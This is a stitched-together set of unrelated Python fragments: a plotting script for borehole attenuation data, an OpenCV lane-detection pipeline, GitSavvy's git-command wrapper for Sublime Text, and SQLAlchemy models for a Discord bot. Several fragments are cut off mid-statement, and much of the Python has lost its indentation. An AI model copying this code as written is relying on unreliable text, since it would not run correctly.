ax1[4].scatter(0.0046, 105, color='orange')
ax1[4].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[4].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[4].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax1[0].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[1].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[2].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[3].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
ax1[4].axhspan(cu_top, cu_bot, color = 'gray', alpha = 0.2)
fig1.text(0.5, 0.01, 'Integrated differential attenuation', fontsize = fs, ha='center')
plt.show()
#fig1.savefig('figures/integrated_attenuation_5.png', dpi=600, bbox_inches = 'tight', format='png')
#figure 2
fig2, ax2 = plt.subplots(1, 5)
fig2.set_size_inches(7.3, 70/25.4)
fig2.subplots_adjust(wspace = 0.27)
fig2.subplots_adjust(hspace = 0.27)
ax2[0].plot(da_down.isel(t = 2), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[0].invert_yaxis()
ax2[0].set_ylim([cu_bot, cu_top])
ax2[0].set_xlim([0.051, 0.055])
ax2[0].grid(True)
ax2[0].set_ylabel('Depth (m)', fontsize=fs)
ax2[0].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[0].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[0].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[2]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_2')
print(date_string)
#ax2[0].text(0.051, 862, date_string, fontsize=fs)
ax2[1].plot(da_down.isel(t = 6), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[1].invert_yaxis()
ax2[1].set_ylim([cu_bot, cu_top])
ax2[1].set_xlim([0.051, 0.055])
ax2[1].grid(True)
ax2[1].set_yticklabels([])
ax2[1].scatter(0.0046, 105, color='orange')
ax2[1].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[1].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[1].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[6]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_6')
print(date_string)
#ax2[1].text(0.051, 862, date_string, fontsize=fs)
ax2[2].plot(da_down.isel(t = 10), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[2].invert_yaxis()
ax2[2].set_ylim([cu_bot, cu_top])
ax2[2].set_xlim([0.051, 0.055])
ax2[2].grid(True)
ax2[2].set_yticklabels([])
ax2[2].scatter(0.0046, 105, color='orange')
ax2[2].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[2].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[2].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[10]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_10')
print(date_string)
#ax2[2].text(0.051, 862, date_string, fontsize=fs)
ax2[3].plot(da_down.isel(t = 14), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[3].invert_yaxis()
ax2[3].set_ylim([cu_bot, cu_top])
ax2[3].set_xlim([0.051, 0.055])
ax2[3].grid(True)
ax2[3].set_yticklabels([])
ax2[3].scatter(0.0046, 105, color='orange')
ax2[3].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[3].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[3].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[14]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_14')
print(date_string)
#ax2[3].text(0.051, 862, date_string, fontsize=fs)
ax2[4].plot(da_down.isel(t = 18), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[4].invert_yaxis()
ax2[4].set_ylim([cu_bot, cu_top])
ax2[4].set_xlim([0.051, 0.055])
ax2[4].grid(True)
ax2[4].set_yticklabels([])
ax2[4].scatter(0.0046, 105, color='orange')
ax2[4].axhline(y = LGIT + 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[4].axhline(y = CTZ_upper, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax2[4].axhline(y = CTZ_lower - 40, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[18]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 2)
print('date_18')
print(date_string)
fig2.text(0.5, 0.01, 'Integrated differential attenuation', fontsize = fs, ha='center')
#fig2.savefig('figures/integrated_attenuation.png', dpi=600, bbox_inches = 'tight', format='png')
plt.show()
sys.exit()
fig2, ax2 = plt.subplots(1, 2)
fig2.set_size_inches(7.3, 3.5)
rect5 = patch.Rectangle((up_an_l, up_an_bot), up_an_r - up_an_l, up_an_top - up_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect6 = patch.Rectangle((bot_an_l, bot_an_bot), bot_an_r - bot_an_l, bot_an_top - bot_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect7 = patch.Rectangle((up_an_l, up_an_bot), up_an_r - up_an_l, up_an_top - up_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
rect8 = patch.Rectangle((bot_an_l, bot_an_bot), bot_an_r - bot_an_l, bot_an_top - bot_an_bot, linewidth=lw, facecolor='none', edgecolor = 'orange')
#easier to put y_axis calculations in line as there are so many
ax2[0].plot(da_up.isel(t = 4), (da_up.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 1 up', lw = lw)
ax2[0].plot(da_down3.isel(t = 4), (da_down3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 down', lw = lw)
ax2[0].plot(da_up3.isel(t = 4), (da_up3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 up', lw = lw)
ax2[0].plot(da_down.isel(t = 4), y_axis, label='channel 1 down', lw = lw, color='k')
ax2[0].invert_yaxis()
ax2[0].set_ylim([1045, 0])
ax2[0].set_xlim([-0.003, 0.0625])
ax2[0].grid(True)
ax2[0].set_ylabel('Depth (m)', fontsize=fs)
ax2[0].add_patch(rect5)
ax2[0].add_patch(rect6)
ax2[0].axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
date = pd.to_datetime(str(da.t.values[4]))
date_string = date.strftime('%b %d')+'-'+str(date.day + 4)
ax2[0].text(0.0045, 55, date_string, fontsize=fs)
ax2[1].plot(da_up.isel(t = -1), (da_up.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 1 up', lw = lw)
ax2[1].plot(da_down3.isel(t = -1), (da_down3.z - bh_start)*(bh_depth/bh_depth_dts), label='channel 3 down', lw | |
<filename>advanced_lane_detection_main.py
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
from moviepy.editor import VideoFileClip
left_fit_poly = []
right_fit_poly = []
objpoints = [] # 3D points
imgpoints = [] # 2D points
# nx and ny define the number of corners in x and y direction
nx = 9
ny = 6
# Using glob function, all the calibration images are used to calculate parameters
images = glob.glob('camera_cal\\calibration*.jpg')
objp = np.zeros((9*6, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
for fname in images:
# for each chessboard image, gray scale conversion is done
# the opencv function findChessboardCorners is used to detect corners
img = mpimg.imread(fname)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, corners = cv2.findChessboardCorners(gray, (9, 6), None)
if ret:
imgpoints.append(corners)
objpoints.append(objp)
# img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
def undistort_image(img_in, mtx_in, dist_in):
# This is the function which undistorts using the calibration parameters
dst = cv2.undistort(img_in, mtx_in, dist_in, None, mtx_in)
return dst
def create_threshold_binary_image(undist_img):
# RGB to HLS Conversion
hls = cv2.cvtColor(undist_img, cv2.COLOR_RGB2HLS)
# using s channel and applying thresholds for lane detection
s_channel = hls[:, :, 2]
thresh_s_ch = (215, 255) # Threshold values found by testing
s_ch_binary = np.zeros_like(s_channel)
s_ch_binary[(s_channel >= thresh_s_ch[0]) & (s_channel <= thresh_s_ch[1])] = 1
# Sobel operator is applied to the undistorted gray image in x direction
# The sudden changes in image pixels are detected
gray_undist = cv2.cvtColor(undist_img, cv2.COLOR_RGB2GRAY)
sobel_kernel = 5
sobelx = cv2.Sobel(gray_undist, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobel = np.absolute(sobelx)
scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))
thresh_sobel = (20, 100) # Threshold values are found by testing
sobel_x_binary = np.zeros_like(scaled_sobel)
sobel_x_binary[(scaled_sobel >= thresh_sobel[0]) & (scaled_sobel <= thresh_sobel[1])] = 1
# After some testing, it was found that in some specific situations, the r-channel
# does a better job of detecting right lanes than s channel, specially when light
# colored road patches are in the frame.
r_channel = undist_img[:, :, 0]
thresh_r = (210, 255) # Threshold values are found by testing
binary_r = np.zeros_like(r_channel)
binary_r[(r_channel > thresh_r[0]) & (r_channel <= thresh_r[1])] = 1
# Creating a combined image with sobel, binary red and s channel binary
combined_binary = np.zeros_like(sobel_x_binary)
combined_binary[(sobel_x_binary == 1) | (binary_r == 1) | (s_ch_binary == 1)] = 1
return combined_binary
def perspective_transform(cmb_bin_img):
# trapezoid to be transformed
src = np.float32(
[[580, 460],
[1110, 720],
[205, 720],
[703, 460]])
# rectangular area on which the above trapezoid is warped to
dst = np.float32(
[[320, 0],
[960, 720],
[320, 720],
[960, 0]])
# Getting perspective transform matrix and warping the image
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
image_size = (cmb_bin_img.shape[1], cmb_bin_img.shape[0])
warped_img = cv2.warpPerspective(cmb_bin_img, M, image_size, flags=cv2.INTER_LINEAR)
return warped_img, Minv
def find_lane_pixels(img_warped):
# The histogram of the lower bottom of the image is taken.
# High values in the histogram point towards lanes in those regions
# Lane lines are likely to be mostly vertical nearest to the car
bottom_half = img_warped[img_warped.shape[0] // 2:, :]
histogram = np.sum(bottom_half, axis=0)
out_img = np.dstack((img_warped, img_warped, img_warped))*255
mid_point = np.int(histogram.shape[0]//2)
left_x_base = np.argmax(histogram[:mid_point])
right_x_base = np.argmax(histogram[mid_point:]) + mid_point
# Sliding windows method is used to find lanes
nwindows = 9 # Number of sliding windows
margin = 80 # Width of the window
minpix = 50 # Minimum number of pixels to be found to recenter window
# Size of each window is image height divided by number of windows
win_height = np.int(img_warped.shape[0]//nwindows)
non_zero_pixels = img_warped.nonzero()
non_zero_y = np.array(non_zero_pixels[0])
non_zero_x = np.array(non_zero_pixels[1])
# Current position to be updated later for each window
left_x_current = left_x_base
right_x_current = right_x_base
# Empty lists to receive the indices of left and right lane pixels
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Upper and lower boundaries of the window
win_y_low = img_warped.shape[0] - (window + 1) * win_height
win_y_high = img_warped.shape[0] - window * win_height
# left and right boundaries of the window
win_xleft_low = left_x_current - margin
win_xleft_high = left_x_current + margin
win_xright_low = right_x_current - margin
win_xright_high = right_x_current + margin
# Draw the windows on te visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low),(win_xright_high, win_y_high), (0, 255, 0), 2)
# Identifying non zero pixel in x and y within the window
good_left_inds = ((non_zero_y >= win_y_low) & (non_zero_y < win_y_high) &
(non_zero_x >= win_xleft_low) & (non_zero_x < win_xleft_high)).nonzero()[0]
good_right_inds = ((non_zero_y >= win_y_low) & (non_zero_y < win_y_high) &
(non_zero_x >= win_xright_low) & (non_zero_x < win_xright_high)).nonzero()[0]
# Appending the indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# Recenter the upcoming window if minpix number of pixels are found
if len(good_left_inds) > minpix:
left_x_current = np.int(np.mean(non_zero_x[good_left_inds]))
if len(good_right_inds) > minpix:
right_x_current = np.int(np.mean(non_zero_x[good_right_inds]))
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
left_x = non_zero_x[left_lane_inds]
left_y = non_zero_y[left_lane_inds]
right_x = non_zero_x[right_lane_inds]
right_y = non_zero_y[right_lane_inds]
return left_x, left_y, right_x, right_y, out_img
def fit_polynomial(transformed_img):
# the pixel where non zero values are found are returned
left_x, left_y, right_x, right_y, out_img = find_lane_pixels(transformed_img)
# polynomial coefficients for left and right lanes are found and lines are created
left_fit = np.polyfit(left_y, left_x, 2)
right_fit = np.polyfit(right_y, right_x, 2)
ploty = np.linspace(0, transformed_img.shape[0] - 1, transformed_img.shape[0])
# Using the polynomial coefficients found from above, the left and right lane
# points are found
left_fit_x = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fit_x = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Update previous poly - in this case they will be updated from zero
global left_fit_poly
left_fit_poly = left_fit
global right_fit_poly
right_fit_poly = right_fit
# Visualization ##
# Colors in the left and right lane regions
out_img[left_y, left_x] = [255, 0, 0]
out_img[right_y, right_x] = [0, 0, 255]
# Plots the left and right polynomials on the lane lines
# plt.plot(left_fit_x, ploty, color='yellow')
# plt.plot(right_fit_x, ploty, color='yellow')
return out_img, left_fit_x, right_fit_x, ploty, left_fit, right_fit
def search_around_polynomial(binary_warped, left_fit_prev, right_fit_prev):
# This the margin around previously found polynomial where lanes will be searched
margin = 70
# Grab the activated pixels
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Here the area of search based on activated x-values within the +/- margin
# of the previously found polynomial function is set
left_lane_inds = ((nonzerox > (left_fit_prev[0]*(nonzeroy**2) + left_fit_prev[1]*nonzeroy +
left_fit_prev[2] - margin)) & (nonzerox < (left_fit_prev[0]*(nonzeroy**2) +
left_fit_prev[1]*nonzeroy + left_fit_prev[2] + margin)))
right_lane_inds = ((nonzerox > (right_fit_prev[0]*(nonzeroy**2) + right_fit_prev[1]*nonzeroy +
right_fit_prev[2] - margin)) & (nonzerox < (right_fit_prev[0]*(nonzeroy**2) +
right_fit_prev[1]*nonzeroy + right_fit_prev[2] + margin)))
# Extract left and right lane activated pixels
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit new polynomial
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
# Using polynomial coefficients from above, left and right lane points are found
left_fit_x = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fit_x = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Update array for previous polynomials
global left_fit_poly
left_fit_poly = left_fit
global right_fit_poly
right_fit_poly = right_fit
# Visualization ##
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fit_x - margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fit_x + margin, ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fit_x - margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fit_x + margin, ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))
| |
"""
Define a base command class that:
1) provides a consistent interface with `git`,
2) implements common git operations in one place, and
3) tracks file- and repo- specific data the is necessary
for Git operations.
"""
from collections import deque, ChainMap
import io
from itertools import chain, repeat
from functools import partial
import locale
import os
import re
import shutil
import stat
import subprocess
import time
import traceback
import sublime
from ..common import util
from .settings import SettingsMixin
from GitSavvy.core.fns import filter_
from GitSavvy.core.runtime import enqueue_on_worker, run_as_future
from GitSavvy.core.utils import paths_upwards, resolve_path
MYPY = False
if MYPY:
from typing import Callable, Deque, Dict, Iterator, List, Optional, Sequence, Tuple, Union
git_path = None
error_message_displayed = False
repo_paths = {} # type: Dict[str, str]
git_dirs = {} # type: Dict[str, str]
DECODE_ERROR_MESSAGE = """
The Git command returned data that is unparsable. This may happen
if you have checked binary data into your repository, or not UTF-8
encoded files. In the latter case use the 'fallback_encoding' setting.
-- Partially decoded output follows; � denotes decoding errors --
"""
MIN_GIT_VERSION = (2, 18, 0)
GIT_TOO_OLD_MSG = "Your Git version is too old. GitSavvy requires {:d}.{:d}.{:d} or above."
NOT_SET = "<NOT_SET>"
def communicate_and_log(proc, stdin, log):
# type: (subprocess.Popen, bytes, Callable[[bytes], None]) -> Tuple[bytes, bytes]
"""
Emulates Popen.communicate
Writes stdin (if provided)
Logs output from both stdout and stderr
Returns stdout, stderr
"""
if stdin is not None:
assert proc.stdin
proc.stdin.write(stdin)
proc.stdin.flush()
proc.stdin.close()
stdout, stderr = b'', b''
for line in stream_stdout_and_err(proc):
if isinstance(line, Out):
stdout += line
log(line)
elif isinstance(line, Err):
stderr += line
log(line)
return stdout, stderr
class Out(bytes): pass # noqa: E701
class Err(bytes): pass # noqa: E701
def read_linewise(fh, kont):
# type: (io.BufferedReader, Callable[[bytes], None]) -> None
for line in iter(fh.readline, b''):
kont(line)
def stream_stdout_and_err(proc):
# type: (subprocess.Popen) -> Iterator[bytes]
container = deque() # type: Deque[bytes]
append = container.append
out_f = run_as_future(read_linewise, proc.stdout, lambda line: append(Out(line)))
err_f = run_as_future(read_linewise, proc.stderr, lambda line: append(Err(line)))
delay = chain([1, 2, 4, 8, 15, 30], repeat(50))
with proc:
while out_f.running() or err_f.running():
try:
yield container.popleft()
except IndexError:
time.sleep(next(delay) / 1000)
# Check and raise exceptions if any
out_f.result()
err_f.result()
yield from container
STARTUPINFO = None
if os.name == "nt":
STARTUPINFO = subprocess.STARTUPINFO()
STARTUPINFO.dwFlags |= subprocess.STARTF_USESHOWWINDOW
HOME = os.path.expanduser('~')
def __search_for_git(folder):
# type: (str) -> Optional[str]
for p in paths_upwards(folder):
if is_git_directory(os.path.join(p, ".git")):
return p
if p == HOME:
break
return None
def is_git_directory(suspect):
# type: (str) -> bool
try:
st = os.stat(suspect)
except (OSError, ValueError):
return False
if not stat.S_ISDIR(st.st_mode):
return True
# Test if the dir looks like a git dir. `HEAD` is mandatory.
ok = os.path.exists(os.path.join(suspect, "HEAD"))
if not ok:
util.debug.dprint("fatal: {} has no HEAD file.".format(suspect))
return ok
def search_for_git(folder):
# type: (str) -> Optional[str]
util.debug.dprint("searching .git upwards, starting at ", folder)
try:
return __search_for_git(folder)
except Exception as e:
util.debug.dprint("searching raised: {}".format(e))
return None
def search_for_git_toplevel(start_folder):
# type: (str) -> Optional[str]
real_start_folder = resolve_path(start_folder)
real_repo_path = search_for_git(real_start_folder)
if real_start_folder == start_folder:
return real_repo_path
if not real_repo_path:
return None
user_repo_path = search_for_git(start_folder)
if user_repo_path and os.path.samefile(real_repo_path, user_repo_path):
return user_repo_path
return real_repo_path
def git_version_from_path(git_path):
try:
stdout = subprocess.check_output(
[git_path, "--version"],
stderr=subprocess.PIPE,
startupinfo=STARTUPINFO
).decode()
except Exception:
stdout = ""
match = re.match(r"git version ([0-9]+)\.([0-9]+)\.([0-9]+)", stdout)
if match:
version = tuple(map(int, match.groups()))
return version
else:
return None
def is_subpath(topfolder, path):
# type: (str, str) -> bool
return os.path.commonprefix([topfolder, path]) == topfolder
class _GitCommand(SettingsMixin):
"""
Base class for all Sublime commands that interact with git.
"""
def git(
self,
git_cmd,
*args,
stdin=None,
working_dir=None,
show_panel=None,
show_panel_on_error=True,
throw_on_error=True,
decode=True,
stdin_encoding="utf-8",
custom_environ=None,
just_the_proc=False
):
"""
Run the git command specified in `*args` and return the output
of the git command as a string.
If stdin is provided, it should be a string and will be piped to
the git process. If `working_dir` is provided, set this as the
current working directory for the git process; otherwise,
the `repo_path` value will be used.
"""
window = self.some_window()
final_args = self._add_global_flags(git_cmd, list(args))
command = [self.git_binary_path] + list(filter_(final_args))
command_str = " ".join(["git"] + command[1:])
if show_panel is None:
show_panel = git_cmd in self.savvy_settings.get("show_panel_for")
if show_panel:
panel = util.log.init_panel(window)
log = partial(util.log.append_to_panel, panel)
log("$ {}\n".format(command_str))
if not working_dir:
try:
working_dir = self.repo_path
except RuntimeError as e:
# do not show panel when the window does not exist
raise GitSavvyError(str(e), show_panel=False, window=window)
except Exception as e:
raise GitSavvyError(str(e), show_panel=show_panel_on_error, window=window)
stdout, stderr = None, None
environ = ChainMap(
custom_environ or {},
self.savvy_settings.get("env") or {},
os.environ
)
try:
start = time.time()
p = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=environ,
startupinfo=STARTUPINFO
)
if just_the_proc:
return p
if isinstance(stdin, str):
stdin = stdin.encode(encoding=stdin_encoding)
if show_panel:
log_b = lambda line: log(line.decode("utf-8", "replace"))
stdout, stderr = communicate_and_log(p, stdin, log_b)
else:
stdout, stderr = p.communicate(stdin)
except Exception as e:
# this should never be reached
raise GitSavvyError(
"$ {} ({})\n\n"
"Please report this error to GitSavvy:\n\n{}\n\n{}".format(
command_str, working_dir, e, traceback.format_exc()
),
cmd=command,
show_panel=show_panel_on_error,
window=window
)
finally:
if not just_the_proc:
end = time.time()
util.debug.log_git(final_args, working_dir, stdin, stdout, stderr, end - start)
if show_panel:
log("\n[Done in {:.2f}s]".format(end - start))
if decode:
try:
stdout, stderr = self.strict_decode(stdout), self.strict_decode(stderr) # type: ignore[assignment]
except UnicodeDecodeError:
stdout_s = stdout.decode("utf-8", "replace")
stderr_s = stderr.decode("utf-8", "replace")
raise GitSavvyError(
"$ {}\n{}{}{}".format(
command_str,
DECODE_ERROR_MESSAGE,
stdout_s,
stderr_s,
),
cmd=command,
stdout=stdout_s,
stderr=stderr_s,
show_panel=show_panel_on_error,
window=window
)
if throw_on_error and not p.returncode == 0:
stdout_s, stderr_s = self.ensure_decoded(stdout), self.ensure_decoded(stderr)
if "*** Please tell me who you are." in stderr_s:
show_panel_on_error = False
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_setup_user"))
raise GitSavvyError(
"$ {}\n\n{}{}".format(command_str, stdout_s, stderr_s),
cmd=command,
stdout=stdout_s,
stderr=stderr_s,
# If `show_panel` is set, we log *while* running the process
# and thus don't need to log again.
show_panel=show_panel_on_error and not show_panel,
window=window
)
return stdout
def git_throwing_silently(self, *args, **kwargs):
return self.git(
*args,
throw_on_error=True,
show_panel_on_error=False,
**kwargs
)
def get_encoding_candidates(self):
# type: () -> Sequence[str]
return [
'utf-8',
locale.getpreferredencoding(),
self.savvy_settings.get("fallback_encoding")
]
def strict_decode(self, input):
# type: (bytes) -> str
encodings = self.get_encoding_candidates()
decoded, _ = self.try_decode(input, encodings)
return decoded
def ensure_decoded(self, input):
# type: (Union[str, bytes]) -> str
if isinstance(input, str):
return input
return self.lax_decode(input)
def lax_decode(self, input):
# type: (bytes) -> str
try:
return self.strict_decode(input)
except UnicodeDecodeError:
return input.decode("utf-8", "replace")
def try_decode(self, input, encodings):
# type: (bytes, Sequence[str]) -> Tuple[str, str]
for n, encoding in enumerate(encodings, start=1):
try:
return input.decode(encoding), encoding
except UnicodeDecodeError as err:
if n == len(encodings):
raise err
assert False # no silent fall-through
@property
def git_binary_path(self):
"""
Return the path to the available `git` binary.
"""
global git_path, error_message_displayed
if not git_path:
git_path_setting = self.savvy_settings.get("git_path")
if isinstance(git_path_setting, dict):
git_path = git_path_setting.get(sublime.platform())
if not git_path:
git_path = git_path_setting.get('default')
else:
git_path = git_path_setting
if not git_path:
git_path = shutil.which("git")
if git_path:
version = git_version_from_path(git_path)
if version:
if version < MIN_GIT_VERSION:
msg = GIT_TOO_OLD_MSG.format(*MIN_GIT_VERSION)
git_path = None
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary too old.")
else:
git_path = None
if not git_path:
msg = ("Your Git binary cannot be found. If it is installed, add it "
"to your PATH environment variable, or add a `git_path` setting "
"in the GitSavvy settings.")
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary not found.")
return git_path
def _current_window(self):
# type: () -> Optional[sublime.Window]
try:
return self.window # type: ignore[attr-defined]
except AttributeError:
return self.view.window() # type: ignore[attr-defined]
def _current_view(self):
# type: () -> Optional[sublime.View]
try:
return self.view # type: ignore[attr-defined]
except AttributeError:
return self.window.active_view() # type: ignore[attr-defined]
def _current_filename(self):
# type: () -> Optional[str]
try:
return self.view.file_name() # type: ignore[attr-defined]
except AttributeError:
return self.window.extract_variables().get("file") # type: ignore[attr-defined]
def _search_paths(self):
# type: () -> Iterator[str]
def __search_paths():
# type: () -> Iterator[str]
file_name = self._current_filename()
if file_name and not os.path.isfile(file_name):
file_name = None
if file_name:
yield os.path.dirname(file_name)
window = self._current_window()
if window:
folders = window.folders()
if folders:
if (
not file_name
or not is_subpath(resolve_path(folders[0]), resolve_path(file_name))
):
yield folders[0]
return filter(os.path.isdir, __search_paths())
def find_repo_path(self):
# type: () -> Optional[str]
view = self._current_view()
repo_path = view.settings().get("git_savvy.repo_path") if view else None
if repo_path and os.path.exists(repo_path):
return repo_path
return next(filter_(map(self._find_git_toplevel, self._search_paths())), None)
def _find_git_toplevel(self, folder):
# type: (str) -> Optional[str]
try:
return repo_paths[folder]
except KeyError:
repo_path = search_for_git_toplevel(folder)
if repo_path:
util.debug.dprint("using ", os.path.join(repo_path, ".git"))
repo_paths[folder] = repo_path
else:
util.debug.dprint("no .git | |
<reponame>11Tuvork28/M3E5
from sqlalchemy.dialects.mysql import CHAR
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, FLOAT, BIGINT, DATETIME, ForeignKey, VARCHAR, TEXT, BOOLEAN
from sqlalchemy.orm import relationship
from base_folder.config import Session
'''
The following classes represent there corresponding database table
'''
Base = declarative_base()
class Banlist(Base):
__tablename__ = "blacklist"
id = Column(BIGINT, primary_key=True, autoincrement=True)
user_id = Column(BIGINT)
class BannedChannelsCmds(Base):
__tablename__ = "banned_channels_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
channel_id = Column(BIGINT, ForeignKey('channels.channel_id'))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_channels_cmds")
channels = relationship("Channels", back_populates="banned_channels_cmds")
commands = relationship("Commands", back_populates="banned_channels_cmds")
class BannedRolesCmds(Base):
__tablename__ = "banned_roles_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, ForeignKey("roles.role_id"))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_roles_cmds")
roles = relationship("Roles", back_populates="banned_roles_cmds")
commands = relationship("Commands", back_populates="banned_roles_cmds")
class BannedUsersCmds(Base):
__tablename__ = "banned_users_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_users_cmds")
user_info = relationship("UserInfo", back_populates="banned_users_cmds")
commands = relationship("Commands", back_populates="banned_users_cmds")
class BannedChannelsSpam(Base):
__tablename__ = "banned_channels_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
channel_id = Column(BIGINT, ForeignKey('channels.channel_id'), primary_key=True)
guilds = relationship("Guild", back_populates="banned_channels_spam")
channels = relationship("Channels", back_populates="banned_channels_spam")
class BannedRolesSpam(Base):
__tablename__ = "banned_roles_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, ForeignKey("roles.role_id"), primary_key=True)
guilds = relationship("Guild", back_populates="banned_roles_spam")
roles = relationship("Roles", back_populates="banned_roles_spam")
class BannedUsersSpam(Base):
